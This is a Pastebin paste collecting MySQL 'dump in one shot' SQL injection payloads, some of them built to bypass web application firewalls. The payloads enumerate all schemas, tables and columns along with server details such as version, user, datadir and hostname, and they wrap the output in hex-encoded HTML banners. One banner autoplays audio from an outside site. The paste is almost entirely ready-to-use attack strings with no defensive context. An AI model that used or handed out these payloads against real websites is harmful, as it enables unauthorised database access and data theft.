Advertisement
Fadly31337

Kumpulan DIOS (bypass waf)

Oct 18th, 2020
695
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
MySQL 7.99 KB | None | 0 0
  1. DIOS (DUMP IN ONE SHOOT) BY FADLY 31337
  2.  
  3.  
  4. 1. (select(@)from(select(@:=0x00),(select(@)from(information_schema.columns)where(@)in(@:=concat(@,0x3C62723E,table_name,0x3a,column_name))))a)
  5.  
  6. 2. (select(select concat(@:=0xa7,(select count(*)from(information_schema.columns)where(@:=concat(@,0x3c6c693e,table_name,0x3a,column_name))),@)))
  7.  
  8. 3. (Select export_set(5,@:=0,(select count(*)from(information_schema.columns)where@:=export_set(5,export_set(5,@,table_name,0x3c6c693e,2),column_name,0xa3a,2)),@,2))
  9.  
  10. 4. make_set(6,@:=0x0a,(select(1)from(information_schema.columns)where@:=make_set(511,@,0x3c6c693e,table_name,column_name)),@)
  11.  
  12. 5. (Select+export_set(5,@:=0,(select+count(*)from(information_schema.columns) where@:=export_set(5,export_set(5,export_set(5,@,table_schema,0x3c6c693e,2),table_name,0xa3a,2),column_name,0xa3a,2)),@,2))
  13.  
  14. 6. (select(@x)from(select(@x:=0x00),(@running_number:=0),(@tbl:=0x00),(select(0)from(information_schema.columns)where(table_schema=database())and(0x00)in(@x:=Concat(@x,0x3c62723e,if((@tbl!=table_name),Concat(0x3c2f6469763e,LPAD(@running_number:=@running_number%2b1,2,0x30),0x3a2920203c666f6e7420636f6c6f723d7265643e,@tbl:=table_name,0x3c2f666f6e743e,0x3c62723e,(@z:=0x00),0x3c646976207374796c653d226d617267696e2d6c6566743a333070783b223e), 0x00),lpad(@z:=@z%2b1,2,0x30),0x3a292020,0x3c666f6e7420636f6c6f723d626c75653e,column_name,0x3c2f666f6e743e))))x)
  15.  
  16. 7. unhex(hex(/*!50000concat*/(0x3c62723e3c666f6e7420636f6c6f723d22726564222073697a653d2237223e7e7e52405a7e7e3c2f666f6e743e3c62723e56657273696f6e7e,/*!50000version*/(),0x7e20,@@version_comment,0x3c62723e557365727e,/*!50000user*/(),0x3c62723e5072696d6172792044617461626173657e,/*!database*/(),0x3c62723e3c666f6e7420636f6c6f723d22677265656e223e4e6f204f66204461746162617365737e,(/*!50000select*/ count(/*!50000schema_name*/) from /*!50000information_schema*/.SCHEMATA),0x3c62723e4e6f204f66205461626c65737e,(/*!50000select*/ count(*) from /*!50000information_schema*/.tables where table_schema=/*!database*/()),(/*!50000select*/(@x)from(/*!50000select*/(@x:=0x00),(@xz:=0),(@xx:=0x00),(/*!50000select*/(0)from(/*!50000information_schema*/.columns)where(table_schema!=0x696e666f726d6174696f6e5f736368656d61)and(0x00)in(@x:=/*!50000concat*/(@x,0x3c62723e,if((@xx!=table_name),/*!50000concat*/(0x3c2f6469763e,LPAD(@xz:=@xz%2b1,2,0x30),0x3a292020,0x3c666f6e7420636f6c6f723d7265643e,0x7c7c,/*!50000table_schema*/,0x7c7c3c2f666f6e743e3c666f6e7420636f6c6f723d2279656c6c6f77223e,@xx:=/*!50000table_name*/,0x3c2f666f6e743e,0x3c62723e,(@z:=0x00),0x3c646976207374796c653d226d617267696e2d6c6566743a333070783b223e), 0x00),lpad(@z:=@z%2b1,2,0x30),0x3a292020,0x3c666f6e7420636f6c6f723d626c75653e,/*!50000column_name*/,0x3c2f666f6e743e))))x))))
  17.  
  18. 8. concat(0x3c63656e7465723e3c666f6e742073697a653d2238223e3c666f6e7420636f6c6f723d22626c61636b223e496e6a6563746572207734726c30636b3c2f666f6e743e3c2f666f6e743e3c2f63656e7465723e,@@datadir,0x3C62723E3C666F6E7420636F6C6F723D626C75653E7C557365727C207E3E203C2F666F6E743E,0x3c617564696f206175746f706c61793e3c736f75726365207372633d22687474703a2f2f6c712e646a2d70756e6a61622e696e666f2f736f6e67732f34382f32363238342f536f756c6a617325323053746f727925323028526161674a6174742e636f6d292e6d7033223e3c2f617564696f3e,user(),0x3C62723E3C666F6E7420636F6C6F723D677265656E3E7C56657273696F6E7C207E3E203C2F666F6E743E,version(),0x3C62723E3C666F6E7420636F6C6F723D707572706C653E7C44427C207E3E3E203C2F666F6E743E,database(),0x3C62723E3C666F6E7420636F6C6F723D233842303030303E7C506F72747C207E3E3E203C2F666F6E743E,@@port,0x3C62723E3C666F6E7420636F6C6F723D233737383839393E7C546D704469727C207E3E3E203C2F666F6E743E,@@tmpdir,0x3C62723E3C666F6E7420636F6C6F723D234443313433433E7C43757272656E745F557365727C207E3E3E203C2F666F6E743E,current_user(),0x3C62723E3C666F6E7420636F6C6F723D234646443730303E7C53797374656D5F557365727C207E3E3E203C2F666F6E743E,system_user(),0x3C62723E3C666F6E7420636F6C6F723D233546394541443E7C53657373696F6E5F557365727C207E3E3E203C2F666F6E743E,session_user(),0x3C62723E3C666F6E7420636F6C6F723D6C696D653E7C536368656D617C207E3E3E203C2F666F6E743E,schema(),0x3c62723e,0x3c666f6e7420636f6c6f723d626c75653e,0x7c486f7374204e616d657c207e203e3e,@@HOSTNAME,0x3c62723e,0x3c666f6e7420636f6c6f723d7265643e,0x7c53796d6c696e6b7c207e203e3e,@@HAVE_SYMLINK,0x3c62723e,0x3c666f6e7420636f6c6f723d677265656e3e,0x7c426974732044657461696c737c207e203e3e,@@VERSION_COMPILE_MACHINE,0x3c62723e%20,0x3c666f6e7420666163653d636f75726965723e,0x7c46696c652053797374656d7c207e203e3e,@@CHARACTER_SET_FILESYSTEM,make_set(6,@:=0x0a,(select(1)from(information_schema.columns)where@:=make_set(511,@,0x3c6c693e,table_name,column_name)),@)%20)
  19.  
  20.  
  21.  
  22. [+] DIOS WAFF [+]
  23.  
  24. 1. concat/*!(unhex(hex(concat/*!(0x3c2f6469763e3c2f696d673e3c2f613e3c2f703e3c2f7469746c653e,0x223e,0x273e,0x3c62723e3c62723e,unhex(hex(concat/*!(0x3c63656e7465723e3c666f6e7420636f6c6f723d7265642073697a653d343e3c623e4b6174726f782044756d7020496e204f6e652053686f74205175657279203c2f666f6e743e3c2f63656e7465723e3c2f623e))),0x3c62723e3c62723e,0x3c666f6e7420636f6c6f723d626c75653e4d7953514c2056657273696f6e203a3a20,version(),0x7e20,@@version_comment,0x3c62723e5072696d617279204461746162617365203a3a20,@d:=database(),0x3c62723e44617461626173652055736572203a3a20,user(),(/*!12345selEcT*/(@x)/*!from*/(/*!12345selEcT*/(@x:=0x00),(@r:=0),(@running_number:=0),(@tbl:=0x00),(/*!12345selEcT*/(0) from(information_schema./**/columns)where(table_schema=database()) and(0x00)in(@x:=Concat/*!(@x, 0x3c62723e, if( (@tbl!=table_name), Concat/*!(0x3c666f6e7420636f6c6f723d707572706c652073697a653d333e,0x3c62723e,0x3c666f6e7420636f6c6f723d626c61636b3e,LPAD(@r:=@r%2b1, 2, 0x30),0x2e203c2f666f6e743e,@tbl:=table_name,0x203c666f6e7420636f6c6f723d677265656e3e3a3a204461746162617365203a3a203c666f6e7420636f6c6f723d626c61636b3e28,database(),0x293c2f666f6e743e3c2f666f6e743e,0x3c2f666f6e743e,0x3c62723e), 0x00),0x3c666f6e7420636f6c6f723d626c61636b3e,LPAD(@running_number:=@running_number%2b1,3,0x30),0x2e20,0x3c2f666f6e743e,0x3c666f6e7420636f6c6f723d7265643e,column_name,0x3c2f666f6e743e))))x)))))*/
  25.  
  26. 2. export_set(5,@:=0,(select+count(*)/*!50000from*/+/*!50000information_schema*/.columns+where@:=export_set(5,export_set(5,@,0x3c6c693e,/*!50000column_name*/,2),0x3a3a,/*!50000table_name*/,2)),@,2)
  27.  
  28. 3. +and@x:=concat+(@:=0,(select+count(*)/*!50000from*/information_schema.columns+where+table_schema=database()+and@:=concat+(@,0x3c6c693e,table_name,0x3a3a,column_name)),@)/*!50000UNION*/SELECT+
  29.  
  30. 4. (/*!12345sELecT*/(@)from(/*!12345sELecT*/(@:=0x00),(/*!12345sELecT*/(@)from(`InFoRMAtiON_sCHeMa`.`ColUMNs`)where(`TAblE_sCHemA`=DatAbAsE/*data*/())and(@)in(@:=CoNCat%0a(@,0x3c62723e5461626c6520466f756e64203a20,TaBLe_nAMe,0x3a3a,column_name))))a)
  31.  
  32. 5. /*!00000concat*/(0x3c666f6e7420666163653d224963656c616e6422207374796c653d22636f6c6f723a7265643b746578742d736861646f773a307078203170782035707820233030303b666f6e742d73697a653a33307078223e496e6a6563746564206279204468346e692056757070616c61203c2f666f6e743e3c62723e3c666f6e7420636f6c6f723d70696e6b2073697a653d353e44622056657273696f6e203a20,version(),0x3c62723e44622055736572203a20,user(),0x3c62723e3c62723e3c2f666f6e743e3c7461626c6520626f726465723d2231223e3c74686561643e3c74723e3c74683e44617461626173653c2f74683e3c74683e5461626c653c2f74683e3c74683e436f6c756d6e3c2f74683e3c2f74686561643e3c2f74723e3c74626f64793e,(select%20(@x)%20/*!00000from*/%20(select%20(@x:=0x00),(select%20(0)%20/*!00000from*/%20(information_schema/**/.columns)%20where%20(table_schema!=0x696e666f726d6174696f6e5f736368656d61)%20and%20(0x00)%20in%20(@x:=/*!00000concat*/(@x,0x3c74723e3c74643e3c666f6e7420636f6c6f723d7265642073697a653d333e266e6273703b266e6273703b266e6273703b,table_schema,0x266e6273703b266e6273703b3c2f666f6e743e3c2f74643e3c74643e3c666f6e7420636f6c6f723d677265656e2073697a653d333e266e6273703b266e6273703b266e6273703b,table_name,0x266e6273703b266e6273703b3c2f666f6e743e3c2f74643e3c74643e3c666f6e7420636f6c6f723d626c75652073697a653d333e,column_name,0x266e6273703b266e6273703b3c2f666f6e743e3c2f74643e3c2f74723e))))x))
  33.  
  34. 6. (/*!50000select*/+concat+(@:=0,(/*!50000select*/+count(*) from+/*!50000information_schema.tables*/+WHERE(TABLE_SCHEMA!=0x696e666f726d6174696f6e5f736368656d61)AND@:=concat+(@,0x3c62723e,/*!50000table_name*/)),@))
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement